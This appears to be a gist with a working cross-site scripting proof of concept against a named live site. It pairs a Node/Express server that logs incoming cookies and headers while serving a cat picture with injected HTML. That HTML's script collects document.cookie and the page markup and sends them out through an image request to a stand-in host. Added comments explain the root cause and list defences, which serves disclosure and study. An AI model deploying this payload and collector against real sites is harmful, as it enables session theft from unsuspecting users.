Last active
July 14, 2018 21:40
XSS on https://ontiques.co/
// Request recorder from an XSS proof of concept: every GET is answered with
// the same JPEG while the request's metadata is written to stdout.
// NOTE(review): the log line carries client-controlled values (URL, headers,
// cookies) verbatim, so treat the output as untrusted when reading or parsing it.
const fs = require('fs')
const express = require('express')

const app = express()

// Read once at startup; the same bytes are served for every request.
const cat = fs.readFileSync('osiris.jpg')

// Request properties copied into the INFOS part of the log line, in this order.
const loggedFields = [
  'headers',
  'baseUrl',
  'body',
  'cookies',
  'fresh',
  'hostname',
  'ip',
  'ips',
  'method',
  'originalUrl',
  'params',
  'path',
  'protocol',
  'query',
  'route',
  'secure',
  'signedCookies',
  'stale',
  'subdomains',
  'xhr'
]

app.get('*', (req, res) => {
  // Snapshot of the listed request properties.
  // NOTE(review): no body- or cookie-parsing middleware is registered in this
  // file, so body, cookies and signedCookies are presumably undefined here
  // (JSON.stringify omits undefined properties) — confirm against the Express
  // version in use.
  const infos = {}
  for (const field of loggedFields) {
    infos[field] = req[field]
  }

  console.info(`METHOD=${req.method} IP="${req.ip}" URL="${req.originalUrl}" COOKIES=${JSON.stringify(req.cookies)} HEADERS=${JSON.stringify(req.headers)} INFOS=${JSON.stringify(infos)}`)

  // The response is the image regardless of path or query string.
  res.type('jpg').end(cat)
})

// PORT from the environment wins; 3333 is the fallback.
const port = process.env.PORT || 3333
app.listen(port)
console.log('Started on port %d!', port)
<!--
  Proof-of-concept markup accompanying the XSS report named in this gist's title.

  What it demonstrates: if a page renders this submitted text as HTML instead of
  encoding it, the inline script runs in that page's origin. It gathers
  document.cookie, the page URL, the document object and the body/head markup
  into `data`, then reassigns the image's src so the browser issues a GET that
  carries the serialized `data` in the `data` query parameter.
  NOTE(review): "https://site/..." looks like a placeholder host, confirm.

  Defensive notes:
  - Root cause is rendering user-supplied text without output encoding or
    sanitisation; fixing that removes the issue.
  - Cookies set with the HttpOnly attribute are not exposed through
    document.cookie.
  - A Content-Security-Policy that disallows inline scripts and restricts
    img-src to known hosts limits both the execution and the outbound request.
  - For detection, look for image requests to unexpected hosts that carry an
    unusually long query string.
-->
| J'avais une question de la plus haute importance. | |
| Trouvez-vous ce chat mignon ? | |
| <br><br> | |
| <img id="MONCHAT" width="400" src="https://site/imagedechat.jpg" alt="Mon chat osiris"> | |
| <script> | |
| data = { | |
| cookie: document.cookie, | |
| location: document.location.href, | |
| doc: document, | |
| body: document.body.outerHTML, | |
| head: document.head.outerHTML | |
| } | |
| document.getElementById('MONCHAT').src = `https://site/imagedechat.jpg?data=${escape(JSON.stringify(data))}` | |
| </script> |